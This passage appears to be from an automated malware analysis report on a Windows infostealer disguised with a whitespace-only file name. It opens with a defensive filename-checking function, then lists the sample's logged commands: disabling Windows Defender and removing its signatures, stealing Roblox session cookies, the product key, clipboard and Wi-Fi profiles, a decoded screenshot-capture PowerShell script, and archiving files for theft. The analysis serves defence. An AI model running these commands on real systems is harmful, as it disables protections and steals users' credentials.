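         "name": unicodedata.name(ch, "<unnamed>"), "category": unicodedata.category(ch)}
        for i, ch in enumerate(real)
        if ch != " " and unicodedata.category(ch) in SUSPICIOUS_CATEGORIES
    ]
    stem, dot, extension = real.rpartition(".")
    if not dot:                      # no extension at all
        stem, extension = real, ""
    flagged_positions = {f["index"] for f in flagged}
    visible_stem = "".join(ch for i, ch in enumerate(stem) if i not in flagged_positions)
    has_rtlo = RTLO in real
    displayed_as = real
    if has_rtlo:                     # text after the override is drawn right to left
        idx = real.index(RTLO)
        displayed_as = real[:idx] + real[idx + 1:][::-1]
    return {
        "real_name": real,
        "real_extension": extension,
        "visible_stem": visible_stem,
        "flagged": flagged,
        "has_rtlo": has_rtlo,
        "displayed_as": displayed_as,
        "verdict": "suspicious" if flagged else "clean",
    }
```

The same check applies to the Startup-folder copy the sample registers (the report can only show it as "? ? .scr"); on a live host, walk the Startup directories and run inspect_filename over each entry rather than trusting what the shell displays.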

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded:
$source = @"
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Windows.Forms;
public class Screenshot
{
    public static List<Bitmap> CaptureScreens()
    {
        var results = new List<Bitmap>();
        var allScreens = Screen.AllScreens;
        foreach (Screen screen in allScreens)
        {
            try
            {
                Rectangle bounds = screen.Bounds;
                using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height))
                {
                    using (Graphics graphics = Graphics.FromImage(bitmap))
                    {
                        graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);
                    }
                    results.Add((Bitmap)bitmap.Clone());
                }
            }
            catch (Exception)
            {
                // Handle any exceptions here
            }
        }
        return results;
    }
}
"@
Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms
$screenshots = [Screenshot]::CaptureScreens()
for ($i = 0; $i -lt $screenshots.Count; $i++)
{
    $screenshot = $screenshots[$i]
    $screenshot.Save("./Display ($($i+1)).png")
    $screenshot.Dispose()
}
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6756.tmp" "c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpa